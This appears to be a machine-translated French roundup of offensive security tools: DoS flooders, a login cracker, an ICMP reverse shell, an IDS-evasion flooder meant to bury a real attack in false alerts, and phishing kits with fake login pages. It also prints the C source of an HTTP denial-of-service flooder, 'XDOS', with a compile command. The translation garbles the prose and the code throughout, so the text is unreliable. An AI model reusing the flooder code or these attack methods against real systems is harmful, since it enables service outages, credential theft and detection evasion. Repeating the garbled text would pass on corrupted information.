Une fois que vous avez enregistré votre nom de serveur, allez faire vos paramètres DNS de domaine et de définir ces serveurs de noms que les serveurs de noms faisant autorité pour votre domaine. Si par exemple votre domaine est « », vous entrez dans et Maintenant, tout le trafic DNS seront dirigés vers la machine où vous avez l’intention d’exécuter Rebind, ce qui permettra Rebind à accepter et à traiter toutes les demandes DNS pour votre domaine.  »

Relier a été spécialement programmé pour fonctionner uniquement avec les systèmes d’exploitation Linux. Ainsi, il pourrait fonctionner sur BSD, mais pas sur Windows. Il travaillera également sur les systèmes d’exploitation 64-bit. Seuls les pré-requis est que, il doit être exécuté en tant que root, et vous devez avoir installé iptables et listés dans $ PATH. Il a toutes les images filtrées. Il ne fonctionnera pas avec IPv6 soit. Considérant que nous avons une autre année pour IPv6 d’être populaire, nous pourrions tout aussi bien jouer avec elle pour l’instant!

Rappelez-vous! Vous devez avoir le http://your-domain-name/init visite de l’utilisateur final et non pas seulement http://your-domain-name/. (En fait, nous sont demandés à ce sujet!)

SSL NetCat Capable
Vous savez tous ce qui est netcat (écrit par Hobbit en 1996), comment l’utiliser et qu’il aurait dû être intégrée dans tous les systèmes UNIX il ya longtemps. netcat manquait certaines fonctionnalités, et j’ai essayé de les ajouter dans cette version de Perl. Par exemple, le support de SSL, TCP et UDP mandatement et IPv4/IPv6 fonctionnalités de proxy. C’est désormais chose faite, à moins que j’ai raté un bug. Maintenant, profitez.

ShareScan est un utilitaire gratuit qui permet au personnel informatique de sécurité pour identifier ouvrir des partages de fichiers Windows disponibles sur le réseau interne. Cet outil peut aider les administrateurs à identifier les systèmes qui ont de larges autorisations ouvert ou aucune autorisation – des vulnérabilités potentielles qui devraient être assainis.

DoS HTTP Slowloris

T50 Sukhoi PAK FA
T50 Sukhoi PAK FA mixte Packet injecteur (alias F22 Raptor) est un outil conçu pour effectuer des tests de stress. Il est un puissant et un outil paquet unique injection, qui est capable de:

* Envoyez séquentielle (c.-à-peu près, sur le même temps) les protocoles suivants:

1. ICMP – Internet Control Message Protocol
2. IGMP – Protocole de gestion de groupe Internet
3. TCP – Transmission Control Protocol
4. UDP – User Datagram Protocol

* Envoyer un montant (très) incroyable de paquets par seconde, ce qui en fait un «second to none » outil:

1. Plus de 1.000.000 de pourcentage du SYN Flood (+60% de la liaison montante du réseau) dans un réseau 1000BASE-T (Gigabit Ethernet).
2. Plus de 120.000 pps de SYN Flood (+60% de la liaison montante du réseau) dans un réseau 100BASE-TX (Fast Ethernet).

* Effectuer des « stress tests » sur une variété d’infrastructures de réseau, les périphériques réseau et de solutions de sécurité en place.
* Simulation d’attaques par déni de service-, la validation des règles de pare-feu et Intrusion Detection System / Intrusion Prevention System politiques.

Wont dire beaucoup de choses à ce sujet – il suffit de télécharger et de voir par vous-même la puissance de cet outil. Oh! Avons-nous oublié de vous dire que c’est un outil open source, programmé en C?

Un jeu d’outils complet pour attaquer les faiblesses inhérentes du protocole IPV6 et ICMP6, et comprend un facile d’employer la bibliothèque de l’usine de paquets. S’il vous plaît note pour obtenir un accès complet à tous les outils disponibles vous avez besoin de développer des outils IPV6 vous-même ou proposer des correctifs, des outils et des commentaires au THC-ipv6 projet.

UDP Unicorn
Une inondation Win32 UDP / DoS (Denial of Service) d’utilité avec le multithreading. la bibliothèque Winsock utilise pour créer des sockets UDP et l’inondation d’une cible. Pour les tests de sécurité réseau.

Yersinia est un outil de réseau conçu pour tirer parti de certaines weakeness dans les protocoles réseau différents. Il prétend être un cadre solide pour analyser et tester les réseaux et les systèmes déployés.

Actuellement, il existe certains protocoles réseau mis en œuvre, mais d’autres sont à venir (nous dire lequel est votre préféré). Les attaques pour les protocoles réseau suivants sont mis en œuvre (mais bien sûr vous êtes libre de mise en œuvre de nouvelles):

* Protocole Spanning Tree (STP)
* Cisco Discovery Protocol (CDP)
* Protocole Trunking dynamique (DTC)
* Dynamic Host Configuration Protocol (DHCP)
* Hot Standby Router Protocol (HSRP)
* IEEE 802.1Q
* IEEE 802.1X
* Protocole Inter-Switch Link (ISL)
* VLAN Trunking Protocol (VTP)

HotFuzzThe HotFuzz projet vise à fournir un outil pour découvrir les failles de sécurité dans les applications réseau. A la base est le cadre de fuzzing Peach. Pour HotFuzz comprendre les protocoles existants, dissecteurs Wireshark sont utilisés. Il met en œuvre une fonctionnalité de proxy entre les applications réseau. Il modifie les données avant de les transmettre au programme fuzzed. En opérant comme un proxy réseau entre l’application client et le serveur et effectue en temps réel l’analyse des données et de fuzzing. Nous savons tous que Peach est capable d’effectuer deux mutation fuzzing base et la production de base. Ainsi, nous pouvons sans risque dire que HotFuzz est également capable de la même chose.

Création d’un fichier fosse. Peut être très difficile pour les utilisateurs inexpérimentés. C’est là que HotFuzz est très pratique car il nécessite très peu de connaissances sur l’application. Enfait il est si facile, qu’il prend les quatre étapes suivantes pour fuzz d’une application –

* Configuration des applications et la partie proxy HotFuzz
* Enregistrement
* Configuration du processus de fuzzing
* Fuzzing

Un biscuit salé du réseau très rapide d’ouverture de session qui supporter de nombreux services

Numéro un des trous de sécurité sont plus des mots de passe, comme le montre le mot de passe toutes les études de sécurité.
Hydra est un pirate connexion parallized qui supporte de nombreux protocoles d’attaquer. Les nouveaux modules
sont faciles à ajouter, à côté de cela, il est souple et très rapide.

Actuellement cet outil prend en charge:
ICQ, SAP/R3, ldap2, normalisé LDAP3, Postgres, Teamspeak, auth Cisco, Cisco permettent,
AFP, ldap2, Cisco AAA (incorporée dans le module telnet).

Cet outil est un code preuve de concept, de donner aux chercheurs et à la sécurité
consultants la possibilité de présenter la façon dont il serait facile d’accéder sans autorisation
l’accès à distance à partir d’un système.

Hyenae est une plateforme très flexible indépendante générateur de paquets réseau. Il vous permet de reproduire plusieurs MITM, DoS et DDoS scénarios d’attaque, est livré avec un démon en cluster à distance et un assistant interactif attaque.

* Inondations ARP-Request
* Empoisonnement ARP Cache-
* Inondations PPPoE d’initiation de session
* Cessation Blind session PPPoE
* Inondations ICMP Echo-
* Attaque ICMP-Schtroumpf
* ICMP base TCP-Connection reset
* Inondations TCP SYN-
* Attaque TCP-Land
* Blind TCP-Connection reset
* Inondations UDP
* Inondations DNS-Query
* Inondations DHCP Découvrez
* Attaque la famine DHCP
* DHCP Release forcer
* Cisco HSRP routeur actif détournement
* Le modèle de configuration basé sur l’adresse de paquets
* Adresse intelligente et de détection de protocole adresse
* Randomisation Smart générique à base de
* Démon pour la mise en place des réseaux d’attaque à distance


https: / / / inquisb / icmpsh
Un Shell ICMP Simple inverse!

Le principal avantage sur les autres outils open source, c’est qu’il ne nécessite pas de privilèges d’administrateur pour exécuter sur la machine cible.


* Les logiciels libres – principalement codées par Nico, fourchue par moi.
* Architecture client / serveur.
* Le capitaine est portable sur toute plate-forme qui peut fonctionner soit C, Perl ou Python code.
* Le système cible doit être Windows parce que l’esclave fonctionne sur cette plate-forme uniquement pour l’instant.
* L’utilisateur exécutant l’esclave sur le système cible ne nécessite pas de privilèges d’administration.

IDS / IPS WAF Evasion / & Tool inondations

Qu’est-ce que inundator?

inundator est un multi-thread, la file d’attente à moteur, outil de l’évasion IDS. Son but est de façon anonyme inondations systèmes de détection d’intrusion (Snort précisément) avec un trafic destiné à déclencher de faux positifs par le biais d’un proxy SOCKS afin de masquer une attaque réelle.

Quand utiliser inundator?

inundator sera utilisé même si vous pensez qu’il ya une chance importante de l’attaque que vous vous apprêtez à effectuer peuvent être détectés par le système de la cible de détection d’intrusion.Vous lancement inundator avant de commencer l’attaque, et continuer à bien fonctionner après avoir fini de l’attaque. L’espoir est que si votre attaque est détectée par l’IDS, l’alerte sera enterré parmi plusieurs milliers de faux positifs, ce qui réduit la possibilité d’un analyste IDS détecter l’attaque réelle.

Ce petit programme, mais très utile, essayez d’envoyer des paquets ICMP sur le réseau local, et de détecter tous les hôtes qui le permettent. Pentecôte cela, vous pouvez trouver des bugs dans votre (entreprise?) Réseau (ou autres), par exemple pour les hôtes qui permettent des connexions P2P.


Lorsque nous utilisons une passerelle, nous envoyons les paquets avec dest IP de la cible, mais le dest mac sur le réseau Ethernet est le mac à la porte d’entrée. Si nous envoyons un paquet à l’macs diferents dans la langue, nous pouvons savoir qui est la passerelle lorsque nous recive une réponse de ce mac.

Parfois, on peut découvrir plus d’une case configuré pour être une passerelle, en général, il s’agit d’une mauvaise configuration, et la boîte de réponse avec un ICMP-Redirect. C’est la même chose, parce que le script seulement vérifier si la réponse mac.

Quelques outils pour NetBIOS et DNS enquête, les attaques, et de la communication.


* DNS backdoor (dnscat)
o v0.04
NetBIOS * requêtes, les enregistrements, et les rejets (nbquery)
NetBIOS * sniff et l’empoisonnement (nbsniff)
* Cross-site scripting sur DNS (dnsxss)
* DNS sniffer (dnslogger)
* Testeur de DNS (dnstest)

NCAT est un utilitaire réseau doté de nombreuses fonctions qui lit et écrit les données à travers les réseaux de la ligne de commande.NCAT a été écrit pour le projet Nmap comme une ré-implémentation nettement améliorée de la vénérable Netcat. Il utilise à la fois TCP et UDP pour la communication et est conçu pour être un outil fiable back-end pour fournir instantanément une connectivité réseau vers d’autres applications et utilisateurs. NCAT permettra non seulement de travailler avec IPv4 et IPv6, mais fournit à l’utilisateur un nombre pratiquement illimité d’utilisations potentielles.

Il s’agit d’un script Perl qui prend un fichier PPCE en entrée et identifie les sous-réseaux valides dans le même. Il prend alors le masque de / 24 et recherche dans tous ces sous-réseaux pour vivre IP. Il a ensuite tous les groupes d’adresses IP basées sur le nombre de sauts.

Ostinato est un open-source, multi-plateforme artisan paquet réseau générateur de trafic et / analyseur avec un GUI facile à utiliser.Artisanat et envoyer des paquets de plusieurs flux avec des protocoles différents à des vitesses différentes. Pour la liste complète des fonctionnalités voir ci-dessous.

Ostinato vise à être «Wireshark in Reverse » et devenir complémentaire de Wireshark.

Caractéristiques ¶

* Fonctionne sur Windows, Linux, BSD et Mac OS X (fonctionnera probablement sur d’autres plateformes également avec peu ou aucune modification, mais cela n’a pas été testé)
* Support des protocoles les plus courants standard
o SNAP Ethernet/802.3/LLC
VLAN o (avec QinQ)
ARP o, IPv4, IPv6, IP-in-Tunnels IP IP alias (6over4, 4over6, 4over4, 6over6)
o Un protocole basé sur du texte (HTTP, SIP, RTSP, NNTP, etc)
o Plus de protocoles dans les œuvres …
* Modifier tous les champs de n’importe quel protocole (certains protocoles permettent de changer les champs des paquets avec tous les paquets au moment de l’exécution, par exemple changer adresses IP / MAC)
* Utilisateur fourni Hex Dump – préciser certains ou tous les octets dans un paquet
* L’utilisateur script défini pour remplacer un protocole non implémentée (EXPERIMENTAL)
* Protocoles de la pile dans n’importe quel ordre arbitraire
* Créer et configurer plusieurs flux
* Les taux de flux Configurer, éclate, no. de paquets
* Seul client peut contrôler et de configurer plusieurs ports sur plusieurs ordinateurs générer du trafic
* Le contrôle exclusif d’un port pour empêcher le système d’exploitation d’envoyer des paquets errants fournit un environnement de test contrôlé
* Statistiques fenêtre montre en temps réel du port de réception / transmission des statistiques et des taux
* Capture de paquets et de les visualiser (besoins Wireshark pour afficher les paquets capturés)
* Cadre d’ajouter facilement de nouveaux constructeurs protocole

Pcapdiff est un outil développé par le FEP pour comparer deux captures de paquets et de déterminer quels pourraient être contrefaits, tombé ou paquets mutilé. Deux amis techniquement incliné peut mettre en place des captures de paquets (tcpdump par exemple ou Wireshark) sur leurs propres ordinateurs et de produire le trafic réseau entre les deux ordinateurs sur Internet. Plus tard, ils peuvent courir pcapdiff sur les deux fichiers de capture de paquets pour identifier les paquets suspects pour complément d’enquête.


proxocket #
Luigi Auriemma a construit un outil formidable qui s’appelle Proxocket, qui peut être utilisé pour capturer les appels entre une application et les fonctions Winsock dans Windows. Proxocket est tout simplement deux fichiers DLL (ws2_32.dll et wsock32.dll) qui doivent être placés dans le même répertoire que l’exe. De l’application pour laquelle vous voulez surveiller le trafic réseau.Ceux-ci agissent en tant que fichiers DLL procurations vers les fichiers réels Winsock DLL (avec les mêmes noms), qui résident dans « C: \ Windows \ System32 \ ». DLL proxy Mise Luigi dans le même dossier que le fichier exe. Causes de l’application de charger les DLL proxy plutôt que les DLL Winsock réel. Proxocket relais tous les paquets entre l’application et le réel Winsock DLL, mais tous les paquets transmis est aussi écrit dans un fichier PAC. Proxocket par.
Proxocket injecte entre l’application et Winsock

Non seulement Proxocket vous permettent de sniffer le trafic vers et à partir d’une application sans avoir à charger un pilote de réseau ou une application raw socket renifler, il permet aussi de scruter le trafic va localhost. Mais pourquoi quelqu’un voudrait-il établir une connexion réseau à localhost, vous pourriez demander. J’ai personnellement utilisé prises localhost dans mes applications quand je code en cours d’exécution dans différents processus ou threads et ont besoin d’un moyen efficace pour eux d’échanger des données de manière asynchrone (NetworkMiner ne pas en utiliser localhost pour la communication inter-processus, cependant). Je suis en fait assez sûr de nombreux développeurs de logiciels utilisent des sockets localhost quand ils ont besoin pour assurer l’échange de données entre les différents processus.
Localhost connexions sont également utilisés lorsque Stunnel en cours d’exécution ou de procurations TOR sur votre machine locale, qui crypter tout le trafic sortant. Vous pouvez ainsi utiliser Proxocket afin de capturer le trafic réseau AVANT il est chiffré par Stunnel ou TOR.

pwnat, prononcé « poe-nat », est un outil qui permet à tout
nombre de clients derrière des NAT de communiquer avec un
serveur derrière un NAT séparée avec * pas de redirection de port *
* et aucune configuration DMZ * sur tous les routeurs pour faire directement
communiquer les uns avec les autres. Le serveur n’a pas besoin
de savoir quoi que ce soit sur les clients essayant de se connecter.

Autrement dit, il s’agit d’un serveur proxy qui fonctionne derrière un NAT,
même lorsque le client est derrière un NAT, sans troisième partie.

Il n’y a pas d’intermédiaire, pas de proxy, pas de troisième partie,
pas de UPnP / STUN / ICE requis, aucune usurpation, et pas de trucs DNS.

Plus important encore, le client peut alors se connecter à tout
d’accueil ou d’un port sur un hôte distant ou à un hôte fixe et
port a décidé par le serveur.


rdp2tcp est un outil de tunneling sur le dessus de Remote Desktop Protocol (RDP). Il utilise les capacités de RDP canal virtuel pour multiplexer plusieurs ports d’expédition sur une session rdesktop déjà établi.

Fonctions disponibles:

* Transfert de port TCP
* Transfert inverse de port TCP
stdin processus de transfert * / out
* SOCKS5 soutien minimal

Le code est découpé en 2 parties:

* Le client en cours d’exécution sur le côté client rdesktop
* Le serveur qui tourne sur le côté serveur Terminal Server

Une fois que les clients rdp2tcp et le serveur sont exécutés, la gestion des tunnels est effectuée par le contrôleur (sur le côté client).Le contrôleur général écouter sur localhost (port 8477) d’attente pour les inscriptions nouveau tunnel.

Tcpjunk est un des protocoles TCP générales d’essai et le piratage des services publics.
Caractéristiques principales: ¶

* Prise en charge IPv4/IPv6
* Automatiquement envoyer / recevoir des données en fonction de configuration de session prédéfinie
* Le mode Client / Serveur
* Prise en charge SSL
* Données dynamiques d’insertion et de manipulation en utilisant les balises
Génération de trafic *
* En mode graphique

Tunnels TCP sur les paquets UDP. Fonctionne dans l’espace utilisateur sur Linux, Solaris, Cygwin (avec extension IPv6), et natif Win32. Actuellement il n’y a pas d’authentification ou de chiffrement


Un outil simple HTTP DoS!


$ # Define WIN32_LEAN_AND_MEAN
$ # Include
$ # Include
$ # Include

$ Unsigned long fil = 0;

connect_tv int $ statique (struct sockaddr_in * addr, int timeout);
$ Statique DWORD WINAPI dosmain (p LPVOID);
const $ int main (int argc, char * argv [])
$ {
$ If (argc! = 4) {
$ Puts (« \ t \ t \ t \ tXDOS – par Bull Moose \ n »);
$ Printf (: argv « Usage% s [IP] [Port] [Sujets] \ n », [0]);
$ 1 de retour;
$ Puts (« OPE Initier … \ n »);
$ Struct sockaddr_in saddr;
$ Unsigned long tid;
$ Int i;
$ Memset (& saddr, ‘\ 0’, sizeof (saddr));
$ Saddr.sin_family = AF_INET;
$ Saddr.sin_addr.s_addr = inet_addr (argv [1]);
$ Saddr.sin_port = (short) htons (atoi (argv [2]));
$ Pour (i = 1; i <= atoi (argv [3]); i + +) CreateThread (0,0, dosmain, (LPVOID) & saddr, 0, & tid);
$ Puts (« déroulement de l’attaque engagée \ n »);
$ Dosmain (& saddr);
$ Return 0;
connect_tv int $ statique (struct sockaddr_in * addr, int timeout)
$ {
$ S int;
$ I unsigned long;
wr_fds fd_set $, err_fds;
$ Struct timeval tv;
$ If (s == 0 | | s == INVALID_SOCKET) return 0;
timeout = tv.tv_sec $ / 1000;
$ Tv.tv_usec = 0;
$ I = 1;
$ Ioctlsocket (s, FIONBIO, & i);
$ Pour (;;) {
$ I = communiquer (s, (struct sockaddr *) addr, sizeof (struct sockaddr_in));
$ If (i! = SOCKET_ERROR)
$ Goto exit_connected;
$ I = WSAGetLastError ();
$ If (i == WSAENOBUFS) {
$ Sleep (50);
$ Continuer;
$ Break;
$ Goto exit_err;
$ FD_ZERO (& wr_fds);
$ FD_SET (s, & wr_fds);
$ FD_ZERO (& err_fds);
$ FD_SET (s, & err_fds);
$ I = select (s +1, NULL, & wr_fds, & err_fds, et tv);
$ If (i == 0 | | i == -1)
$ Goto exit_err;
$ If (FD_ISSET (s, & err_fds) | |! FD_ISSET (s, & wr_fds))
$ Goto exit_err;
$ Exit_connected:
$ I = 0;
$ Ioctlsocket (s, FIONBIO, & i);
$ S le retour;
$ Exit_err:
closesocket $ (s);
$ Return 0;
$ Statique DWORD WINAPI dosmain (p LPVOID)
$ {
Extern unsigned $ long fil;
thread $ + +;
$ Printf (« % u nombre Thread lancé \ n! », Fils);
$ Struct sockaddr_in addr;
$ Char Buffer [] = \
$ « GET / HTTP/1.1 \ r \ n »
$ « Host: \ r \ n \ r \ n »;
$ SetThreadPriority (GetCurrentThread (), THREAD_PRIORITY_BELOW_NORMAL);
$ Sock int;
$ If (p == NULL) Début ex;
$ Addr = * (struct sockaddr_in *) p;
$ Pour (;;) {
$ Sock = connect_tv (& addr, 8);
$ If (chaussette! = 0) {
$ Send (sock, Buffer, strlen (Buffer), 0);
$ Sleep (300);
closesocket $ (sock);
$} Else if (sock == SOCKET_ERROR) {
$ Puts (« Erreur:. Erreur de socket \ n »);
ExitProcess $ (1);
$ Ex: ExitThread (0);
$ Return 0;

$ $ Befire supprimer tous les compiler

@ Xdos.exe gcc-S-O-o-xdos.c lws2_32

RPSS (Remote Shell SÉCURITÉ Penetration Testing) est l’outil EXTENSION DE VOTRE SHELL ou bash. Il va ajouter QUELQUES FONCTIONNALITE SUPPLÉMENTAIRES SUR LA BASE DE SÉCURITÉ ET DE PENETRATION à votre shell. Cet outil va accéder à Internet depuis invite de commande. En gros, cela Worke outil comme un BROUSER DE shell de commande. IL fatch VULNARABLITY liés à la sécurité et il affichera ET CONSERVER sa sortie dans les fichiers spécifiques. C’EST SHELL DE SÉCURITÉ puissante qui peut être pénétrer dans tout type DE LA DEMANDE WEB. Si vous êtes expérimenté TESTEUR HACKERSAFE ou la pénétration, puis en utilisant cet outil vous pouvez rendre votre processus de pénétration plus rapide et facile. CET OUTIL EST couvrant presque tous les techniques de piratage et de pénétration.En gros, si vous êtes nouveau dans MONDE ET SECURITRY vous avez des devoirs difficiles à pénétrer APPLICATION WEB DE NOMBREUX QUE VOUS POUVEZ ALORS accomplir votre tâche en quelques heures UTILISANT RPSS.

Pourquoi RPSS?

Si nous parlons Techniquement ENTIER PROGRAMMATION RPSS a été faite selon Thread Thread grand nombre se fait CREAT POUR REMPLIR UN PROCESSUS. SO le temps d’exécution ET PROCESSUS DE RPSS est très rapide, puis Outils AUTRES. La logique de chaque tâche est très unique, il ira à l’encontre TOUT DE LA CIBLE. Ce n’est pas chose cet objectif n’a STRONG du firewall, système de détection d’intrusion ou ET FILTARATION IP est installé.RPSS SERA PAR passer tous les couches de sécurité et il vous fournira des RISULT PRÉCISE. VOUS pouvez utiliser cet outil dans un but différent, comme les tests PENETRATION JURIDIQUE, TESTER VOTRE PROPRE WebApplication VULNARABLITIES, BUT enquête médico-légale, tester les composants SEUCRITY ETC …

1> getProxy
2 Testproxylist>
3> Testproxy
4 autoproxy>
5> Jumping
6> Loadproxy
7> supprimer
8> Modification
9 ip> se
10 adresses smtp> accaparement
11> traçage bruts
12> identifier la technologie de serveur (en-tête)
13> collecte plein d’infos serveur tête
14> ramper e-mails provenant des moteurs de recherche (capacité de suivre des emails trop compliqué)
15 site> rampants (liens s’agiter de même répertoire)
16 Finder> page de connexion (soutien à des ASP, ASPX, PHP, CFM, JSP, HTML, HTM, sans des charges utiles)
17 sous> recensement de domaine
18 titres> nom d’hôte de la gamme IP
Analyse 19> service de serveurs Web
20 structure du site> empreintes digitales
21> qui est rechercher
22> inverser
23> énumère les utilisateurs du serveur
D’impression 24> pied démon
25 système d’exploitation> impression pied
26> SSLcheck (par cette tâche, vous pouvez tester chiffrement SSL)
27> DBcheck (par cette tâche, vous pouvez tester la base de données)
28> La surveillance de serveur web
29> obtenir des informations de port + d’infos service (avec du fil de manière très rapide)
D’injection 30> SQL Scan
automobile de 30,1> numérisation url
auto-30.2> la création d’url exploitable
auto-30.3> cheacking version
auto-30.4> fusée table
D’injection 31> balayage aléatoire
32 LFI> scan
33 rfi> scan
34 rce> scan
35 xss> scan (HTTPS soutien aussi)
36 cgi> scan (chemins vuln plus)
37 cm> scan (joomla soutien, etc … REMOB)
38> analyse personnalisée
39> analyse complète
40> ftp bruiting (premier chèque de connexion anonyme)
41> bruiting smtp
42> bruiting imap
43> bruiting nntp
44> bruiting pop3
45> débrutage RDP
46 rdp> débrutage de plage d’adresses IP
47> Hashid
48 Onlinehash>
49 Autohash>
50> Md5
51> Sha1
52> SHA256
53> SHA384
54> SHA512
55> Base64enc
56> Base64dec
57 constructeurs liste de mots> utilisant une combinaison personnalisée
58> extraire des adresses IP à partir de fichiers
59> extraire des courriels à partir de fichiers
60> ramper mots de l’un des web qui vous est donnée par
61 utilitaire wget>
Task Server
62> obtenir des informations de port + d’infos service (avec du fil de manière très rapide)
63 d’injection SQL> scan
auto-63.1> numérisation url
auto-63.2> la création d’url exploitable
auto-63.3> cheacking version
auto-63.4> fusée table
D’injection 64> balayage aléatoire
65 LFI> scan
66 rfi> scan
67 rce> scan
68 xss> scan (HTTPS soutien aussi)
69 cgi> scan (chemins vuln plus)
70 cms> scan (joomla soutien, etc … REMOB)
71> analyse personnalisée
72> analyse complète
73> obtenir des informations de port + d’infos service (avec du fil de manière très rapide)
74 d’injection SQL> scan
auto-74.1> numérisation url
auto-74.2> la création d’url exploitable
auto-74.3> cheacking version
auto-74.4> fusée table
75 d’injection> balayage aléatoire
76 LFI> scan
77 rfi> scan
78 rce> scan
79 xss> scan (HTTPS soutien aussi)
80 cgi> scan (chemins vuln plus)
81 cm> scan (joomla soutien, etc … REMOB)
82> analyse personnalisée
83> analyse complète
84 analyse maleware>
85 analyse de Troie> (tâche très stupide)
Exe 86> à lot
87 Fileanalysis>
88 iptrace>
89> Penmysql
90> Penpostgray
91> Penmssql
92 Penoracle>
93 Penaccess>
EXPLOIT (pas testé tous)
94 Expsearch>
95> Milexpgrab
96> Pacexpgrab
97> Mad
98 Boa>
99 Buletftp>
100 CesarFTP>
101 Efs>
102 Dorkscan>
103 sous-balayage>
104 Gvscan>
105 Shellscan>
106 Ranker>
107 Usergrab>
108 Dorkcreator>
109 Cmsscan>
RACINE (en développement)
110> Bandtest
111> Les inondations
112 Honeypot>
113> Chat
114> Jeux
115 Ids>
116 automachine>

Ingénierie sociale

Imposteur est un cadre flexible pour effectuer navigateur attaques de phishing. Une fois le système en cours d’exécution Imposter est configuré comme serveur DNS pour les victimes, le serveur DNS interne de Imposter résout toutes les requêtes DNS à lui-même.

Lorsque la victime essaie d’accéder à tout site Web du domaine décide de le système qui exécute le serveur Imposter et Imposter Web interne sert du contenu de la victime. Selon la configuration des charges utiles sont envoyés à la victime. Les données volées à la victime est renvoyée à imposteur et il est stocké dans une base de données SQLite dans un dossier créé avec son nom basé sur la date et l’heure de l’attaque.

Les listes des attaques effectuées sont:

* Cookies Steal
* Placer des cookies
* Steal Local Shared Objects
* Mots de passe stockés Steal de FireFox
* Les fichiers mis en cache Steal
* Cache du navigateur Poison
* Les fichiers Steal du système de la victime fichier local via Internet Explorer
* Exécuter des requêtes SQL sur Google de la victime base de données Gears et transférer les résultats
* Créer un ResourceStore et gérés ResourceStore sur LocalServer de la victime Google Gears

Exigences générales:

* Des droits d’administration:


o Imposter écoute sur les ports et 53/UDP 80/TCP
o Le module ‘Stealer File’ exécute un détecteur interne

* Système exécutant Imposter doit avoir l’adresse IP


o interne du serveur DNS résout tous les domaines à

* WinPcap doit être installé sur le système

S-E Ninja
SE Ninja est un outil d’ingénierie sociale, avec des pages 20-25 sites populaires faux et mailer anonyme via fonction mail () en PHP.

Sites disponibles:

* (hotmail)
* (AR, FR Langs)
* (AR, FR Langs)


* Fakepages.
* IP, page malveillante vous donne l’adresse ip de la victime.
* Mailer.

Vous pouvez envoyer un message anonyme utilisant PHP mail () Fonction / [SENINJA] / admin / mail et vous pouvez obtenir votre ip victime le mettre dans la base de données « / [SENINJA] / ip / »

Télécharger à partir de

Boîte à outils d’ingénierie sociale
« La boîte à outils d’ingénierie sociale (SET) est une suite python-conduit d’outils personnalisés qui se concentre uniquement sur l’attaque de l’élément humain des tests de pénétration. Son but principal est d’accroître et de simuler des attaques d’ingénierie sociale et permettre à l’appareil d’essai pour tester efficacement la façon dont une attaque ciblée peut réussir.  »


UCSniff est un VoIP et IP Video Security outil d’évaluation qui intègre les logiciels open source existants dans plusieurs fonctions utiles, permettant la VoIP et IP propriétaires vidéo et professionnels de la sécurité de tester rapidement la menace de non autorisées et contre les écoutes VoIP vidéo. Ecrit en C / C + +, et disponible sur Linux et Windows, le logiciel est gratuit et disponible pour quiconque veut les télécharger, sous la licence GPLv3. Certaines fonctionnalités utiles de UCSniff qui ont été combinés en un seul paquet:

VideoJak est un outil de vidéo sur IP évaluation de la sécurité qui peut simuler une preuve de concept ou d’interception vidéo test rejouer contre une cible, la session vidéo sélectionnée par l’utilisateur. VideoJak est le premier de son genre outil de sécurité qui analyse vidéo codec normes telles que H.264. VideoJak consiste tout d’abord capturer le port RTP utilisés dans une conversation vidéo ou d’un ruisseau. Ensuite, VideoJak analyse les paquets RTP, la collecte des numéros de séquence RTP et les valeurs timestamp utilisé entre les terminaux vidéo. Puis VideoJak crée une charge utile de vidéo personnalisé en changeant les numéros de séquence et les valeurs timestamp utilisé dans les paquets RTP d’origine entre les deux terminaux vidéo. Après que l’utilisateur sélectionne un dispositif vidéo et conçues pour l’attaque lors d’une séance vidéo en cours, VideoJak fournit la charge utile sur le port appris RTP contre la cible.Il en résulte attaque dans un des plusieurs nouvelles fonctionnalités:


Andiparos est un fork du célèbre Proxy Paros. Il s’agit d’une web application open source outil d’évaluation de la sécurité que donne la capacité testeurs de pénétration à l’araignée sites Web, d’analyser le contenu, d’intercepter et modifier les demandes, etc

L’avantage de Andiparos est principalement le soutien des certificats clients sur cartes à puce. En outre, il dispose de plusieurs améliorations de l’interface petites, ce qui rend la vie plus facile pour les testeurs de pénétration …

{} Arachni est un cadre complet de fonctionnalités et modulaire qui permet Ruby testeurs de pénétration et aux administrateurs d’évaluer la sécurité des applications web.

{} Arachni est intelligent, il se forme à chaque réponse HTTP qu’il reçoit au cours du processus d’audit.
Contrairement à d’autres scanners, Arachni prend en compte la nature dynamique des applications web et peut détecter les changements causés lors d’un voyage
à travers chaque chemin de la complexité cyclomatique d’une application Web.
Cette façon vecteurs d’attaque d’entrée / qui seraient autrement indétectables par les non-humains sont parfaitement gérées par Arachni.

Caractéristiques de Arachni:

* Fournir un cadre stable et efficace
* Soyez simple
* Le soutien Cookie-jar
* Le support de SSL.
* User Agent spoofing.
* Support de proxy SOCKS et HTTP pour les (S).
* SOCKS support est fourni gracieusement par socksify.
* L’authentification du proxy.
* L’authentification du site.
* Local DNS limites cache des requêtes de résolution de nom.
* Lib de sortie personnalisés.
* Le système utilise ses propres enveloppes d’impression pour afficher des messages.
* Sortie en surbrillance la ligne de commande, le style Metasploit.
* Exécuter mods dernière option.
* Permet d’exécuter les modules après analyse du site est terminée.
* Abstraction d’assurance-chômage.
* Seuls {Arachni:: UI:: CLI} pour le moment, mais WebUI & GUI sont relativement faciles à mettre en œuvre dès maintenant.
* Les Pièges Ctrl-C interrompre.
Interruptions * suspendre le système, l’utilisateur a alors la possibilité soit de reprendre ou de sortie.

Le Site Crawler inclus avec Arachni a les caractéristiques suivantes:
Le robot est fournie par Anemone avec quelques légères modifications pour tenir compte des fonctionnalités supplémentaires.

* Filtres pour les pages redondantes, comme les galeries, catalogues, etc basés sur des expressions régulières et des compteurs.
exclusion URL * filtre basé sur les expressions régulières.
inclusion URL * filtre basé sur les expressions régulières.
* Les séjours dans le domaine par défaut et il va probablement le rester.
* Peut éventuellement suivre les sous-domaines.
* Multi-thread avec un nombre de thread réglable.
* La limite de profondeur réglable.
* Réglable limite nombre de liens.
* Réglable rediriger limite.

L’analyseur de code HTML fourni par Arachni offre les fonctions suivantes:

Peut extraire et d’analyser:

* Formulaires
* Liens
* Cookies

Le BlindElephant Web Application Fingerprinter tente de découvrir la version d’une application web (connu) en comparant les fichiers statiques à des endroits connus contre les hachages précalculées pour les versions de ces fichiers dans tous les tous les communiqués disponibles. La technique est rapide, à faible bande passante, non-invasive, générique et fortement automatisé.

BodgeIt Store

https: / / / p / bodgeit /
La Boutique BodgeIt est une application web vulnérable qui est actuellement destiné aux personnes qui sont nouveaux à l’essai stylo.

Certaines de ses fonctionnalités et caractéristiques:

* Facile à installer – il suffit nécessite java et un moteur de servlet, par exemple Tomcat
* Autonomes (pas de dépendances supplémentaires autres que de 2 dans la ligne ci-dessus)
* Facile de changer à la volée – toutes les fonctionnalités est mis en œuvre dans les JSP, donc pas nécessaire IDE
* Plate-forme de croix
* Open source
* Pas de db séparée à installer et à configurer – il utilise un « en mémoire » db qui est automatiquement (re) initialisé au démarrage

